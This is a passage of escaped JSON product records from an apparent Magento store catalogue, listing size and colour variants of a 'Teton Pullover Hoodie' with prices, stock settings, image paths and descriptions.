Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},{\"sku\":\"MH02-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-M-Black\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},{\"sku\":\"MH02-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-M-Purple\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},{\"sku\":\"MH02-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-M-Red\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},{\"sku\":\"MH02-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-L-Black\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},{\"sku\":\"MH02-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-L-Purple\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},{\"sku\":\"MH02-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-L-Red\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},{\"sku\":\"MH02-XL-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-XL-Black\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-xl-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"image\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh02-black_alt1.jpg,\\/m\\/h\\/mh02-black_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Black\"},{\"sku\":\"MH02-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-XL-Purple\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"70\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"teton-pullover-hoodie-xl-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh02-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Purple\"},{\"sku\":\"MH02-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Teton Pullover Hoodie-XL-Red\",\"description\":\"<p>This Teton Pullover Hoodie gives you more than laid-back style. It\'s equipped with moisture-wicking fabric to keep light and dry inside, especially in chilly-weather workouts. An elasticized hem lets you move about freely.<\\/p>\\n<p>&bull; Black pullover hoodie.<br \\/>&bull; Soft, brushed interior. <br \\/>&bull; Front hand pockets. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable 